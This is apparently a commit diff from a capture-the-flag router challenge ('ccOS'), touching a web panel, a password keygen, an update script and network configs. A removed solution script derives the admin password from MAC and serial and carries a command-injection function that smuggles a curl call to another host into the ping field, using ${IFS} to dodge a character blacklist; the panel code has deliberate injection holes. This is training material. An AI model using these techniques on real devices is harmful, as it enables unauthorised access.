/bin/echo "ctrl_interface=/var/run/wpa_supplicant" > /etc/wpa_supplicant.conf
/usr/sbin/wpa_passphrase "$1" "$2" >> /etc/wpa_supplicant.conf
/usr/sbin/wpa_supplicant -B -i client0 -c /etc/wpa_supplicant.conf
/sbin/udhcpc -i client0

4
conf/wifi/disconnect.sh
View File

@ -1,4 +0,0 @@
#!/bin/sh
/usr/sbin/wpa_cli -i client0 terminate
/sbin/ip addr flush dev client0

51
keygen/keygen.c
View File

@ -4,9 +4,7 @@
#include <string.h>
#include <math.h>
#include <stdint.h>
#include <ctype.h>
#include <sys/stat.h>
#include <sys/utsname.h>
typedef union uwb
{
@ -73,7 +71,8 @@ unsigned* md5(const char *msg, int mlen)
static short rot1[] = { 5, 9, 14, 20 };
static short rot2[] = { 4, 11, 16, 23 };
static short rot3[] = { 6, 10, 15, 21 };
static short *rots[] = { rot0, rot1, rot2, rot3 };
static short *rots[] = { rot0, rot1, rot2, rot3
};
static unsigned kspace[64];
static unsigned * k;
@ -148,34 +147,12 @@ unsigned* md5(const char *msg, int mlen)
return h;
}
void check_platform()
{
struct utsname kernel;
int len;
int checksum = 0;
if (uname(&kernel) != 0)
{
exit(EXIT_FAILURE);
}
len = strlen(kernel.release);
for (int i = 0; i < len; i++)
{
if (isdigit(kernel.release[i]))
{
checksum += kernel.release[i];
}
}
if (checksum != 266) {
exit(EXIT_FAILURE);
}
}
char *get_mac()
{
FILE * fp;
char *mac = malloc(18* sizeof(char));
fp = fopen("/sys/class/net/ap0/address", "r");
fgets(mac, 18, fp);
fp = fopen("/sys/class/net/wlan0/address", "r");
fgets(mac, 17, fp);
fclose(fp);
return mac;
}
@ -183,9 +160,9 @@ char *get_mac()
char *get_serial()
{
FILE * fp;
char *serial = malloc(33* sizeof(char));
char *serial = malloc(21* sizeof(char));
fp = fopen("/etc/serial", "r");
fgets(serial, 33, fp);
fgets(serial, 20, fp);
return serial;
}
@ -198,16 +175,6 @@ int gen_serial()
}
}
int gen_update_key()
{
if (fopen("/etc/update_key", "r") == NULL)
{
system("/usr/bin/hexdump -n 32 -e '4/4 \"%08X\"' /dev/urandom > /etc/update_key");
}
chown("/etc/update_key", 1001, 1002);
chmod("/etc/update_key", 0600);
}
int gen_ssid()
{
char *serial;
@ -302,13 +269,11 @@ int main()
char *mac;
char *serial;
check_platform();
gen_serial();
gen_ssid();
gen_update_key();
mac = get_mac();
serial = get_serial();
gen_key(serial, mac);
gen_key(mac, serial);
return 0;
}

254
server-config/dhcpd.conf
View File

@ -1,254 +0,0 @@
# dhcpd.conf
#
# Sample configuration file for ISC dhcpd
#
# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;
default-lease-time 600;
max-lease-time 7200;
# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
#log-facility local7;
# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.
#subnet 10.152.187.0 netmask 255.255.255.0 {
#}
# This is a very basic subnet declaration.
#subnet 10.254.239.0 netmask 255.255.255.224 {
# range 10.254.239.10 10.254.239.20;
# option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}
# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.
#subnet 10.254.239.32 netmask 255.255.255.224 {
# range dynamic-bootp 10.254.239.40 10.254.239.60;
# option broadcast-address 10.254.239.31;
# option routers rtr-239-32-1.example.org;
#}
# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
# range 10.5.5.26 10.5.5.30;
# option domain-name-servers ns1.internal.example.org;
# option domain-name "internal.example.org";
# option routers 10.5.5.1;
# option broadcast-address 10.5.5.31;
# default-lease-time 600;
# max-lease-time 7200;
#}
# Hosts which require special configuration options can be listed in
# host statements. If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.
#host passacaglia {
# hardware ethernet 0:0:c0:5d:bd:95;
# filename "vmunix.passacaglia";
# server-name "toccata.example.com";
#}
# Fixed IP addresses can also be specified for hosts. These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP. Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
# hardware ethernet 08:00:07:26:c0:a5;
# fixed-address fantasia.example.com;
#}
# You can declare a class of clients and then do address allocation
# based on that. The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.
#class "foo" {
# match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}
#shared-network 224-29 {
# subnet 10.17.224.0 netmask 255.255.255.0 {
# option routers rtr-224.example.org;
# }
# subnet 10.0.29.0 netmask 255.255.255.0 {
# option routers rtr-29.example.org;
# }
# pool {
# allow members of "foo";
# range 10.17.224.10 10.17.224.250;
# }
# pool {
# deny members of "foo";
# range 10.0.29.10 10.0.29.230;
# }
#}
subnet 10.0.13.0 netmask 255.255.255.0 {
range 10.0.13.10 10.0.13.12;
option routers 10.0.13.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.14.0 netmask 255.255.255.0 {
range 10.0.14.10 10.0.14.12;
option routers 10.0.14.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.15.0 netmask 255.255.255.0 {
range 10.0.15.10 10.0.15.12;
option routers 10.0.15.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.16.0 netmask 255.255.255.0 {
range 10.0.16.10 10.0.16.12;
option routers 10.0.16.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.17.0 netmask 255.255.255.0 {
range 10.0.17.10 10.0.17.12;
option routers 10.0.17.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.18.0 netmask 255.255.255.0 {
range 10.0.18.10 10.0.18.12;
option routers 10.0.18.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.19.0 netmask 255.255.255.0 {
range 10.0.19.10 10.0.19.12;
option routers 10.0.19.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.20.0 netmask 255.255.255.0 {
range 10.0.20.10 10.0.20.12;
option routers 10.0.20.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.21.0 netmask 255.255.255.0 {
range 10.0.21.10 10.0.21.12;
option routers 10.0.21.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.22.0 netmask 255.255.255.0 {
range 10.0.22.10 10.0.22.12;
option routers 10.0.22.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.23.0 netmask 255.255.255.0 {
range 10.0.23.10 10.0.23.12;
option routers 10.0.23.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.24.0 netmask 255.255.255.0 {
range 10.0.24.10 10.0.24.12;
option routers 10.0.24.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.25.0 netmask 255.255.255.0 {
range 10.0.25.10 10.0.25.12;
option routers 10.0.25.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.26.0 netmask 255.255.255.0 {
range 10.0.26.10 10.0.26.12;
option routers 10.0.26.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.27.0 netmask 255.255.255.0 {
range 10.0.27.10 10.0.27.12;
option routers 10.0.27.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.28.0 netmask 255.255.255.0 {
range 10.0.28.10 10.0.28.12;
option routers 10.0.28.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.29.0 netmask 255.255.255.0 {
range 10.0.29.10 10.0.29.12;
option routers 10.0.29.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.30.0 netmask 255.255.255.0 {
range 10.0.30.10 10.0.30.12;
option routers 10.0.30.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.31.0 netmask 255.255.255.0 {
range 10.0.31.10 10.0.31.12;
option routers 10.0.31.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.32.0 netmask 255.255.255.0 {
range 10.0.32.10 10.0.32.12;
option routers 10.0.32.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.33.0 netmask 255.255.255.0 {
range 10.0.33.10 10.0.33.12;
option routers 10.0.33.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.34.0 netmask 255.255.255.0 {
range 10.0.34.10 10.0.34.12;
option routers 10.0.34.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.35.0 netmask 255.255.255.0 {
range 10.0.35.10 10.0.35.12;
option routers 10.0.35.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.36.0 netmask 255.255.255.0 {
range 10.0.36.10 10.0.36.12;
option routers 10.0.36.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.37.0 netmask 255.255.255.0 {
range 10.0.37.10 10.0.37.12;
option routers 10.0.37.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.38.0 netmask 255.255.255.0 {
range 10.0.38.10 10.0.38.12;
option routers 10.0.38.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.39.0 netmask 255.255.255.0 {
range 10.0.39.10 10.0.39.12;
option routers 10.0.39.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.40.0 netmask 255.255.255.0 {
range 10.0.40.10 10.0.40.12;
option routers 10.0.40.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}
subnet 10.0.41.0 netmask 255.255.255.0 {
range 10.0.41.10 10.0.41.12;
option routers 10.0.41.1;
option domain-name-servers 8.8.8.8, 1.1.1.1;
}

185
server-config/interfaces.backup
View File

@ -1,185 +0,0 @@
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
auto enp9s0f0
iface enp9s0f0 inet static
address 130.192.93.78
netmask 255.255.255.0
gateway 130.192.93.17
auto enp9s0f1
iface enp9s0f1 inet static
address 192.168.1.10
netmask 255.255.255.0
auto enp5s0f0
iface enp5s0f0 inet static
address 10.0.0.0
netmask 255.255.255.0
auto enp5s0f0.1013
iface enp5s0f0.1013 inet static
address 10.0.13.1
netmask 255.255.255.0
auto enp5s0f0.1014
iface enp5s0f0.1014 inet static
address 10.0.14.1
netmask 255.255.255.0
auto enp5s0f0.1015
iface enp5s0f0.1015 inet static
address 10.0.15.1
netmask 255.255.255.0
auto enp5s0f0.1016
iface enp5s0f0.1016 inet static
address 10.0.16.1
netmask 255.255.255.0
auto enp5s0f0.1017
iface enp5s0f0.1017 inet static
address 10.0.17.1
netmask 255.255.255.0
auto enp5s0f0.1018
iface enp5s0f0.1018 inet static
address 10.0.18.1
netmask 255.255.255.0
auto enp5s0f0.1019
iface enp5s0f0.1019 inet static
address 10.0.19.1
netmask 255.255.255.0
auto enp5s0f0.1020
iface enp5s0f0.1020 inet static
address 10.0.20.1
netmask 255.255.255.0
auto enp5s0f0.1021
iface enp5s0f0.1021 inet static
address 10.0.21.1
netmask 255.255.255.0
auto enp5s0f0.1022
iface enp5s0f0.1022 inet static
address 10.0.22.1
netmask 255.255.255.0
auto enp5s0f0.1023
iface enp5s0f0.1023 inet static
address 10.0.23.1
netmask 255.255.255.0
auto enp5s0f0.1024
iface enp5s0f0.1024 inet static
address 10.0.24.1
netmask 255.255.255.0
auto enp5s0f0.1025
iface enp5s0f0.1025 inet static
address 10.0.25.1
netmask 255.255.255.0
auto enp5s0f0.1026
iface enp5s0f0.1026 inet static
address 10.0.26.1
netmask 255.255.255.0
auto enp5s0f0.1027
iface enp5s0f0.1027 inet static
address 10.0.27.1
netmask 255.255.255.0
auto enp5s0f0.1028
iface enp5s0f0.1028 inet static
address 10.0.28.1
netmask 255.255.255.0
auto enp5s0f0.1029
iface enp5s0f0.1029 inet static
address 10.0.29.1
netmask 255.255.255.0
auto enp5s0f0.1030
iface enp5s0f0.1030 inet static
address 10.0.30.1
netmask 255.255.255.0
auto enp5s0f0.1031
iface enp5s0f0.1031 inet static
address 10.0.31.1
netmask 255.255.255.0
auto enp5s0f0.1032
iface enp5s0f0.1032 inet static
address 10.0.32.1
netmask 255.255.255.0
auto enp5s0f0.1033
iface enp5s0f0.1033 inet static
address 10.0.33.1
netmask 255.255.255.0
auto enp5s0f0.1034
iface enp5s0f0.1034 inet static
address 10.0.34.1
netmask 255.255.255.0
auto enp5s0f0.1035
iface enp5s0f0.1035 inet static
address 10.0.35.1
netmask 255.255.255.0
auto enp5s0f0.1036
iface enp5s0f0.1036 inet static
address 10.0.36.1
netmask 255.255.255.0
auto enp5s0f0.1037
iface enp5s0f0.1037 inet static
address 10.0.37.1
netmask 255.255.255.0
auto enp5s0f0.1038
iface enp5s0f0.1038 inet static
address 10.0.38.1
netmask 255.255.255.0
auto enp5s0f0.1039
iface enp5s0f0.1039 inet static
address 10.0.39.1
netmask 255.255.255.0
auto enp5s0f0.1040
iface enp5s0f0.1040 inet static
address 10.0.40.1
netmask 255.255.255.0
auto enp5s0f0.1041
iface enp5s0f0.1041 inet static
address 10.0.41.1
netmask 255.255.255.0
auto enp5s0f0.1100
iface enp5s0f0.1100 inet static
address 10.0.100.1
netmask 255.255.255.0
auto enp5s0f0.1101
iface enp5s0f0.1101 inet static
address 10.0.101.1
netmask 255.255.255.0
auto enp5s0f0.1102
iface enp5s0f0.1102 inet static
address 10.0.102.1
netmask 255.255.255.0

8
server-config/iptables
View File

@ -1,8 +0,0 @@
iptables -N LOG_DROP
iptables -I FORWARD -s 10.0.0.0/16 -d 10.0.0.0/16 -j LOG_DROP
iptables -A LOG_DROP -j LOG --log-prefix "refused connection: "
iptables -A LOG_DROP -j DROP
iptables -A FORWARD -i enp5s0f0 -o enp9s0f0 -j ACCEPT
iptables -A FORWARD -i enp5s0f0 -o enp9s0f0 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A POSTROUTING -o enp9s0f0 -j MASQUERADE
#iptables -A FORWARD -j DROP

27
server-config/iptables-save.dropall.rules
View File

@ -1,27 +0,0 @@
# Generated by xtables-save v1.8.2 on Fri Sep 25 17:53:13 2020
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:LOG_DROP - [0:0]
-A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
-A FORWARD -s 10.0.0.0/16 -d 168.119.32.41 -j ACCEPT
-A FORWARD -s 10.0.0.0/16 -d 168.119.32.44 -j ACCEPT
-A FORWARD -s 10.0.0.0/16 -j LOG_DROP
-A FORWARD -i enp5s0f0 -o enp9s0f0 -j ACCEPT
-A FORWARD -i enp5s0f0 -o enp9s0f0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A LOG_DROP -j LOG --log-prefix "refused connection: "
-A LOG_DROP -j DROP
COMMIT
# Completed on Fri Sep 25 17:53:13 2020
# Generated by xtables-save v1.8.2 on Fri Sep 25 17:53:13 2020
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A POSTROUTING -o enp9s0f0 -j MASQUERADE
COMMIT
# Completed on Fri Sep 25 17:53:13 2020

22
server-config/iptables-save.dropvlans.rules
View File

@ -1,22 +0,0 @@
# Generated by xtables-save v1.8.2 on Fri Sep 25 17:53:13 2020
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:LOG_DROP - [0:0]
-A FORWARD -s 10.0.0.0/16 -d 10.0.0.0/16 -j LOG_DROP
-A FORWARD -i enp5s0f0 -o enp9s0f0 -j ACCEPT
-A FORWARD -i enp5s0f0 -o enp9s0f0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A LOG_DROP -j LOG --log-prefix "refused connection: "
-A LOG_DROP -j DROP
COMMIT
# Completed on Fri Sep 25 17:53:13 2020
# Generated by xtables-save v1.8.2 on Fri Sep 25 17:53:13 2020
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A POSTROUTING -o enp9s0f0 -j MASQUERADE
COMMIT
# Completed on Fri Sep 25 17:53:13 2020

41
solution/solution.py
View File

@ -1,41 +0,0 @@
import requests
import hashlib
import sys
def xorshift(x, y, z, w):
t = x
t = t ^ ((t << 11) & 0xFFFFFFFF)
t = t ^ (t >> 8)
x, y, z = y, z, w
w = (w ^ (w >> 19)) ^ t
return x, y, z, w, t
def keygen(mac, serial):
l = 20
password = ""
md5a = hashlib.md5(mac).hexdigest()
md5b = hashlib.md5(serial).hexdigest()
w = int(md5a[0:8], 16)
x = int(md5a[8:16], 16)
y = int(md5a[16:24], 16)
z = int(md5a[24:32], 16)
for i in range(0, l):
x, y, z, w, t = xorshift(x, y, z, w)
password += md5b[t % 20]
return password
def rce(username, password, host, payload):
requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
def main():
serial = sys.argv[1].encode("ascii")
mac = sys.argv[2].encode("ascii")
host = "192.168.77.1"
payload = "curl 192.168.77.10:8080"
password = keygen(mac, serial)
print(password)
#rce("admin", password, host, payload)
main()

47
update/update.sh
View File

@ -1,42 +1,29 @@
#!/bin/sh
if [[ -z $key ]]; then
/bin/echo "Usage: sudo key=<update_key> -E update.sh"
exit 1
fi
password=`/bin/cat /etc/update_key | /usr/bin/sha512sum | /usr/bin/cut -d' ' -f 1`
auth=`/bin/echo -n $key | /usr/bin/sha512sum | /usr/bin/cut -d' ' -f 1`
if [[ "$auth" != "$password" ]]; then
/bin/echo "Wrong password"
exit 1
fi
pubkey="/pub.pem"
file="/tmp/update.tar.cc"
/bin/chmod 777 $file
/bin/echo "### ccOS Update Script ###"
/bin/echo "[+] Starting"
/bin/sleep 1
/bin/echo "[+] Extracting Signature"
file="/tmp/update.tgz.cc"
echo "### ccOS Update Script ###"
echo "[+] Starting"
sleep 1
echo "[+] Extracting Signature"
skip=$(expr $(stat -c '%s' $file) - 256)
if [[ -L $file ]]
then
exit 0
fi
/bin/dd if=/tmp/update.tar.cc of=sig bs=1 count=256 skip=$skip
/usr/bin/truncate -s $skip $file
check=`/usr/bin/openssl dgst -sha256 -verify $pubkey -signature /tmp/sig $file`
dd if=/tmp/update.tgz.cc of=sig bs=1 count=256 skip=$skip > /dev/null 2>&1
truncate -s $skip update.tgz.cc
check=`openssl dgst -sha256 -verify $pubkey -signature /tmp/sig /tmp/update.tgz.cc`
if [ "$check" == "Verified OK" ]
then
/bin/echo "[+] Signature is valid!"
/bin/echo "[+] Upgrading..."
/bin/tar -xvf $file -C /
/bin/rm /tmp/sig
/bin/echo "[+] Done"
echo "[+] Signature is valid!"
echo "[+] Upgrading..."
tar -xvzf /tmp/update.tgz.cc -C /
rm /tmp/update.tgz.cc /tmp/sig
echo "[+] Done"
exit 0
else
/bin/echo "[-] Signature error, exiting..."
/bin/rm /tmp/sig
echo "[-] Signature error, exiting..."
rm /tmp/update.tgz.cc /tmp/sig
exit 1
fi

14
webpanel/includes/auth.php
View File

@ -1,14 +0,0 @@
<?php
$http_username = $_SERVER['PHP_AUTH_USER'];
$http_password = $_SERVER['PHP_AUTH_PW'];
$auth = (hash_equals($http_password, $password));
if (!$auth) {
header('WWW-Authenticate: Basic realm="ccOS Web Panel"');
header('HTTP/1.0 401 Unauthorized');
die ("Not authorized");
}
?>

7
webpanel/includes/config.php
View File

@ -1,10 +1,7 @@
<?php
$site = "ccOS";
$site = "crOS";
$flag = "###FLAG1###";
$interface = "ap0";
$interface = "wlan0";
$blacklist = array(';', '#', '(', ')', '|', '&', ' ', "\t", '<', '>');
$password = file_get_contents("/etc/wpa");
require_once("auth.php");
?>

12
webpanel/index.php
View File

@ -39,12 +39,12 @@ require_once("includes/nav.php");
</tr>
</tbody>
</table>
<?php /*
<h3>Client List</h3>
<?php $leases = file_get_contents('/var/log/dhcpd.leases'); ?>
<pre>
<?php echo $leases ?>
</pre>
<?php /*
<table class="table">
<thead>
<tr>
@ -59,6 +59,16 @@ require_once("includes/nav.php");
<td>00:11:22:AA:BB:CC</td>
<td>desktop-ab2846ad</td>
</tr>
<tr>
<td>192.168.77.2</td>
<td>00:11:22:AA:BB:DD</td>
<td>android-deadbeef</td>
</tr>
<tr>
<td>192.168.77.4</td>
<td>00:11:22:AA:BB:EE</td>
<td>windows-laptop</td>
</tr>
</tbody>
</table>*/?>
</div>

7
webpanel/update.php
View File

@ -4,9 +4,9 @@ require_once("includes/config.php");
require_once("includes/header.php");
require_once("includes/nav.php");
if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000 && isset($_POST['password']) && !empty($_POST['password'])) {
if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['update']['size'] > 10000000 && $_FILES['upfile']['size'] < 10000000) {
move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/update.tgz.cc');
exec("/usr/bin/sudo key='".escapeshellarg($_POST['password'])."' /update.sh", $result);
exec("/usr/bin/sudo /update.sh", $result);
}
?>
@ -14,8 +14,7 @@ if ($_SERVER['REQUEST_METHOD'] === POST && isset($_FILES['update']) && $_FILES['
<h2>System Update</h2>
<form id="update" enctype="multipart/form-data" method="post" action="">
<fieldset>
<input type="file" name="update" required>
<input type="password" name="password" placeholder="Update password" required>
<input type="file" name="update">
<input type="submit" class="btn btn-b btn-sm smooth" value="Upload">
<p>
<ul>

2
webpanel/utils.php
View File

@ -7,7 +7,7 @@ require_once("includes/nav.php");
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] === 'ping' || $_POST['action'] === 'traceroute') && isset($_POST['host']) && !empty($_POST['host'])) {
switch ($_POST['action']) {
case 'ping':
$cmd = '/bin/'.$_POST['action']. ' -c 2';
$cmd = '/bin/'.$_POST['action']. ' -c 4';
break;
case 'traceroute':
$cmd = '/usr/bin/'.$_POST['action'];